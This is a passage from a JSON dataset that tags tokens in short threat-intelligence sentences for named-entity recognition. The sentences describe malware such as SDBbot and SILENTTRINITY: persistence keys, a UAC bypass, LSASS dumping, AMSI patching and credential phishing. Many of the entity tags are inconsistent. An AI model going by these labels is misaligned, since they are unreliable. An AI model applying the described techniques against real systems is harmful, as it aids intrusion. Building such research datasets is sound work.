"fails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "deleted", - "files", - "it", - "has", - "created", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "can", - "download", - "additional", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "run", - "the", - "command", - "`net", - "user`", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "may", - "create", - "a", - "temporary", - "user", - "on", - "the", - "system", - "named", - "`Lost_{Unique", - "Identifier}`", - "with", - "the", - "password", - "`pond~!@6”{Unique", - "Identifier}`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "may", - "save", - "itself", - "as", - "a", - "file", - "named", - "`msdtc.exe`,", - "which", - "is", - "also", - "the", - "name", - "of", - "the", - "legitimate", - "Microsoft", - "Distributed", - "Transaction", - "Coordinator", - "service", - "binary." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "used", - "Windows", - "APIs,", - "including", - "`GetKeyboardType`,", - "`NetUserAdd`,", - "and", - "`NetUserDel`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "S-Type", - "may", - "create", - "a", - ".lnk", - "file", - "to", - "itself", - "that", - "is", - "saved", - "in", - "the", - "Start", - "menu", - "folder.", - "It", - "may", - "also", - "create", - "the", - "Registry", - "key", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", - "IMJPMIJ8.1{3", - "characters", - "of", - "Unique", - "Identifier}</code>." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "may", - "create", - "the", - "file", - "<code>%HOMEPATH%\\Start", - "Menu\\Programs\\Startup\\Realtek", - "{Unique", - "Identifier}.lnk</code>,", - "which", - "points", - "to", - "the", - "malicious", - "`msdtc.exe`", - "file", - "already", - "created", - "in", - "the", - "`%CommonFiles%`", - "directory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "S-Type", - "samples", - "have", - "been", - "packed", - "with", - "UPX." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "S-Type", - "uses", - "Base64", - "encoding", - "for", - "C2", - "traffic." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "initial", - "beacon", - "packet", - "for", - "S-Type", - "contains", - "the", - "operating", - "system", - "version", - "and", - "file", - "system", - "of", - "the", - "victim." - ], - "ner_tags": [ - "O", - "O", - "I-Way", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "attempted", - "to", - "determine", - "if", - "a", - "compromised", - "system", - "was", - "using", - "a", - "Japanese", - "keyboard", - "via", - "the", - "`GetKeyboardType`", - "API", - "call." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "used", - "`ipconfig", - "/all`", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "run", - "tests", - "to", - "determine", - "the", - "privilege", - "level", - "of", - "the", - "compromised", - "user." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "runs", - "the", - "command", - "<code>net", - "start</code>", - "on", - "a", - "victim." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "S-Type", - "has", - "provided", - "the", - "ability", - "to", - "execute", - "shell", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "use", - "application", - "shimming", - "for", - "persistence", - "if", - "it", - "detects", - "it", - "is", - "running", - "as", - "admin", - "on", - "Windows", - "XP", - "or", - "7,", - "by", - "creating", - "a", - "shim", - "database", - "to", - "patch", - "services.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "access", - "the", - "file", - "system", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "decrypt", - "and", - "decompress", - "its", - "payload", - "to", - "enable", - "code", - "execution." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "inject", - "a", - "downloaded", - "DLL", - "into", - "a", - "newly", - "created", - "rundll32.exe", - "process." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "sent", - "collected", - "data", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "delete", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "get", - "directory", - "listings", - "or", - "drive", - "information", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "use", - "image", - "file", - "execution", - "options", - "for", - "persistence", - "if", - "it", - "detects", - "it", - "is", - "running", - "with", - "admin", - "privileges", - "on", - "a", - "Windows", - "version", - "newer", - "than", - "Windows", - "7." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "clean", - "up", - "and", - "remove", - "data", - "structures", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "download", - "a", - "DLL", - "from", - "C2", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "communicate", - "with", - "C2", - "with", - "TCP", - "over", - "port", - "443." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "I-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "XOR", - "the", - "strings", - "for", - "its", - "installer", - "component", - "with", - "a", - "hardcoded", - "128", - "byte", - "key." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "can", - "enumerate", - "a", - "list", - "of", - "running", - "processes", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "use", - "port", - "forwarding", - "to", - "establish", - "a", - "proxy", - "between", - "a", - "target", - "host", - "and", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "add", - "a", - "value", - "to", - "the", - "Registry", - "Run", - "key", - "to", - "establish", - "persistence", - "if", - "it", - "detects", - "it", - "is", - "running", - "with", - "regular", - "user", - "privilege." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "use", - "RDP", - "to", - "connect", - "to", - "victim's", - "machines." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "used", - "rundll32.exe", - "to", - "execute", - "DLLs." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "used", - "a", - "packed", - "installer", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "identify", - "the", - "OS", - "version,", - "OS", - "bit", - "information", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "can", - "collected", - "the", - "country", - "code", - "of", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "determine", - "the", - "domain", - "name", - "and", - "whether", - "a", - "proxy", - "is", - "configured", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "identify", - "the", - "user", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "record", - "video", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDBbot", - "has", - "the", - "ability", - "to", - "use", - "the", - "command", - "shell", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDelete", - "deletes", - "data", - "in", - "a", - "way", - "that", - "makes", - "it", - "unrecoverable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SDelete", - "deletes", - "data", - "in", - "a", - "way", - "that", - "makes", - "it", - "unrecoverable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SEASHARPEE", - "can", - "download", - "remote", - "files", - "onto", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "SEASHARPEE", - "can", - "timestomp", - "files", - "on", - "victims", - "using", - "a", - "Web", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SEASHARPEE", - "is", - "a", - "Web", - "shell." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Tool", - "O" - ] - }, - { - "tokens": [ - "SEASHARPEE", - "can", - "execute", - "commands", - "on", - "victims." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "used", - "base64", - "encoding", - "and", - "XOR", - "to", - "obfuscate", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "upload", - "and", - "download", - "files." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "employ", - "a", - "custom", - "PowerShell", - "script." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "identify", - "the", - "IP", - "address,", - "machine", - "name,", - "and", - "OS", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "identify", - "the", - "domain", - "of", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "identify", - "the", - "username", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHARPSTATS", - "has", - "the", - "ability", - "to", - "identify", - "the", - "current", - "date", - "and", - "time", - "on", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHIPSHAPE", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "APT30", - "may", - "have", - "used", - "the", - "SHIPSHAPE", - "malware", - "to", - "move", - "onto", - "air-gapped", - "networks.", - "SHIPSHAPE", - "targets", - "removable", - "drives", - "to", - "spread", - "to", - "other", - "systems", - "by", - "modifying", - "the", - "drive", - "to", - "use", - "Autorun", - "to", - "execute", - "or", - "by", - "hiding", - "legitimate", - "document", - "files", - "and", - "copying", - "an", - "executable", - "to", - "the", - "folder", - "with", - "the", - "same", - "name", - "as", - "the", - "legitimate", - "document." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHIPSHAPE", - "achieves", - "persistence", - "by", - "creating", - "a", - "shortcut", - "in", - "the", - "Startup", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "has", - "a", - "command", - "to", - "obtain", - "a", - "directory", - "listing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "has", - "a", - "command", - "to", - "retrieve", - "information", - "about", - "connected", - "users." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "is", - "obscured", - "using", - "XOR", - "encoding", - "and", - "appended", - "to", - "a", - "valid", - "GIF", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "has", - "a", - "command", - "to", - "obtain", - "a", - "process", - "listing." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "has", - "a", - "command", - "to", - "list", - "all", - "servers", - "in", - "the", - "domain,", - "as", - "well", - "as", - "one", - "to", - "locate", - "domain", - "controllers", - "on", - "a", - "domain." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHOTPUT", - "uses", - "netstat", - "to", - "list", - "TCP", - "connection", - "status." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHUTTERSPEED", - "can", - "download", - "and", - "execute", - "an", - "arbitary", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SHUTTERSPEED", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "SHUTTERSPEED", - "can", - "collect", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "enumerate", - "the", - "active", - "Window", - "during", - "keylogging", - "through", - "execution", - "of", - "`GetActiveWindowTitle`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "contains", - "a", - "number", - "of", - "modules", - "that", - "can", - "bypass", - "UAC,", - "including", - "through", - "Window's", - "Device", - "Manager,", - "Manage", - "Optional", - "Features,", - "and", - "an", - "image", - "hijack", - "on", - "the", - "`.msc`", - "file", - "extension." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "conduct", - "an", - "image", - "hijack", - "of", - "an", - "`.msc`", - "file", - "extension", - "as", - "part", - "of", - "its", - "UAC", - "bypass", - "process." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "add", - "a", - "CLSID", - "key", - "for", - "payload", - "execution", - "through", - "`Registry.CurrentUser.CreateSubKey(\"Software\\\\Classes\\\\CLSID\\\\{\"", - "+", - "clsid", - "+", - "\"}\\\\InProcServer32\")`." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "B-Way", - "B-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "collect", - "clear", - "text", - "web", - "credentials", - "for", - "Internet", - "Explorer/Edge." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY's", - "`amsiPatch.py`", - "module", - "can", - "disable", - "Antimalware", - "Scan", - "Interface", - "(AMSI)", - "functions." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "`System`", - "namespace", - "methods", - "to", - "execute", - "lateral", - "movement", - "using", - "DCOM." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "`System.Security.AccessControl`", - "namespaces", - "to", - "retrieve", - "domain", - "user", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "use", - "`System.DirectoryServices`", - "namespace", - "to", - "retrieve", - "domain", - "group", - "information." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "transfer", - "files", - "from", - "an", - "infected", - "host", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "remove", - "files", - "from", - "the", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "has", - "several", - "modules,", - "such", - "as", - "`ls.py`,", - "`pwd.py`,", - "and", - "`recentFiles.py`,", - "to", - "enumerate", - "directories", - "and", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY's", - "`credphisher.py`", - "module", - "can", - "prompt", - "a", - "current", - "user", - "for", - "their", - "credentials." - ], - "ner_tags": [ - "B-Way", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "has", - "a", - "module", - "that", - "can", - "extract", - "cached", - "GPP", - "passwords." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "has", - "the", - "ability", - "to", - "set", - "its", - "window", - "state", - "to", - "hidden." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "bypass", - "ScriptBlock", - "logging", - "to", - "execute", - "unmanaged", - "PowerShell", - "code", - "from", - "memory." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "remove", - "artifacts", - "from", - "the", - "compromised", - "host,", - "including", - "created", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "load", - "additional", - "files", - "and", - "tools,", - "including", - "Mimikatz." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "contains", - "a", - "module", - "to", - "conduct", - "Kerberoasting." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "has", - "a", - "keylogging", - "capability." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "create", - "a", - "memory", - "dump", - "of", - "LSASS", - "via", - "the", - "`MiniDumpWriteDump", - "Win32`", - "API", - "call." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Way", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "obtain", - "a", - "list", - "of", - "local", - "groups", - "and", - "members." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "create", - "a", - "backdoor", - "in", - "KeePass", - "using", - "a", - "malicious", - "config", - "file", - "and", - "in", - "TortoiseSVN", - "using", - "a", - "registry", - "hook." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "O", - "O", - "B-Way", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "modify", - "registry", - "keys,", - "including", - "to", - "enable", - "or", - "disable", - "Remote", - "Desktop", - "Protocol", - "(RDP)." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "has", - "the", - "ability", - "to", - "leverage", - "API", - "including", - "`GetProcAddress`", - "and", - "`LoadLibrary`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - "scan", - "for", - "open", - "ports", - "on", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "SILENTTRINITY", - "can", - 